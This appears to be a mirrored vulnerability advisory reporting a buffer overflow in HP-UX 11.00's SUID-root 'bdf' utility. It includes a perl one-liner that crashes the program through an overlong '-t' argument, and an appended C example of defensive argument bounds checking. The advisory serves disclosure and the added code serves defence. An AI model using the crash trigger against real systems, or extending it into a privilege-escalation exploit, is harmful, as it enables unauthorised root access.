[ SOURCE: http://www.secureroot.com/security/advisories/9737056304.html ]

================================================================================
[ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vulnerability
================================================================================

File   : /usr/bin/bdf
SYSTEM : HP-UX 11.00
Tested on HP-UX B.11.00

INFO :

  bdf - report number of free disk blocks (Berkeley version)

  -t type    Report on the file systems of a given type
             (for example, nfs or hfs).

* The 'bdf' program has SUID permission.

  $ ls -la `which bdf`
  -r-sr-xr-x 1 root bin 24576 Apr 7 1998 /usr/bin/bdf

* Using the '-t' option with a long string

  $ bdf -t `perl -e 'print "A"x2415'`
  bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAA..omitted...AAAAAAAAAAAAAAAA : No such file or directory
  usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
  $ bdf -t `perl -e 'print "A"x2416'`
  Memory fault
  $

  bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
  Segmentation fault
  bash-2.04$

*** With an argument longer than 2415 characters, 'bdf' terminates with a
    segmentation fault. 'bdf' probably does not check the bounds of the
    string.

SOLUTION

  Don't know :)

==-------------------------------------------------------------------------------==
  dubhe@hackerslab.org
  [ http://www.hackerslab.org ]
  HACKERSLAB (C) since 2000
==-------------------------------------------------------------------------------==
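
An added example, not part of the original advisory and not bdf's own source (which the advisory does not show): one way a SUID tool can bound and validate a '-t type' argument before copying it into a fixed-size buffer. The function name copy_fstype, the 16-byte FSTYPE_MAX and the allowed character set are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical limit; the size of bdf's real buffer is not known. */
#define FSTYPE_MAX 16

/*
 * Validate a user-supplied file system type and copy it into dst.
 * Returns 0 on success, -1 if the argument is empty, does not fit in
 * dst with its terminator, or has characters outside [A-Za-z0-9_].
 */
int copy_fstype(char *dst, size_t dstsz, const char *arg)
{
    size_t len, i;

    if (dst == NULL || arg == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';                      /* never leave dst uninitialised */

    /* Measure first, and stop reading as soon as the limit is passed. */
    for (len = 0; arg[len] != '\0'; len++)
        if (len + 1 >= dstsz)
            return -1;                  /* too long: reject, do not truncate */
    if (len == 0)
        return -1;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!isalnum(c) && c != '_')
            return -1;
    }

    memcpy(dst, arg, len + 1);          /* length is known to fit */
    return 0;
}

int main(int argc, char **argv)
{
    char fstype[FSTYPE_MAX];

    if (argc != 2 || copy_fstype(fstype, sizeof fstype, argv[1]) != 0) {
        fprintf(stderr, "usage: fstype type (1-%d alphanumeric chars)\n",
                FSTYPE_MAX - 1);
        return 1;
    }
    printf("file system type: %s\n", fstype);
    return 0;
}
```

Rejecting an oversized argument, rather than silently truncating it, keeps a privileged program from acting on a value the caller did not actually supply.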